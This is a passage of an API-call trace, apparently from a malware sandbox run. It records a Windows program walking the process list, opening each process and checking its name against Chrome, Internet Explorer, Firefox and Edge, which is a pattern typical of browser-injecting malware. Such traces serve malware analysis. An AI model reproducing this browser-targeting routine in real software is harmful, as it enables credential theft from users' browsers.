	[0221.483] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.483] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.484] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.484] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x50c8
	[0221.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.485] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.485] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.486] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.486] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x50cc
	[0221.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.487] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.487] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.488] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.488] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.488] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0221.489] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x50d0
	[0221.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.489] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0221.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.490] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.490] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0221.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.490] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x50d4
	[0221.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.491] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.492] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.492] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.492] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0221.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x50d8
	[0221.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.493] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.494] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.494] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.494] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x50dc
	[0221.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.495] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.495] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.496] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.496] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x50e0
	[0221.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.497] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.497] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.498] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.498] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.498] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x50e4
	[0221.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.499] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.499] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.500] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.500] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.500] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0221.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x50e8
	[0221.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.501] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0221.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.501] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.502] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0221.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.502] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0221.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x50ec
	[0221.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.503] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.503] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.504] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.504] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0221.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x50f0
	[0221.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.505] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0221.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.505] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.506] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0221.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.506] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0221.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0221.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0221.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x50f4
	[0221.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.508] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0221.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.508] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.509] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0221.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.509] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0221.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x50f8
	[0221.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.511] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0221.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.511] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.511] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0221.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.511] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.512] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0221.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x50fc
	[0221.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.512] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0221.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.513] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.513] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0221.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.513] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.514] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0221.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5100
	[0221.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.514] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0221.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.515] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.515] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0221.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.516] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0221.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5104
	[0221.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.517] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0221.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.517] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.518] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0221.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.518] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0221.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5108
	[0221.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.519] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0221.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.520] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.520] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0221.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.520] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0221.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x510c
	[0221.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.522] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0221.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.522] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.523] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0221.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.523] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0221.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5110
	[0221.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.524] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0221.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.525] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.525] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0221.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.526] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0221.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5114
	[0221.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.527] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0221.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.527] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.528] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0221.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.528] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0221.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5118
	[0221.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.529] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0221.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.529] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.529] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0221.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.530] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0221.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x511c
	[0221.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.531] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0221.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.531] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.531] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0221.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.532] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0221.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5120
	[0221.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.533] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0221.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.534] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.534] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0221.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.535] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0221.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5124
	[0221.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.536] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0221.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.537] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
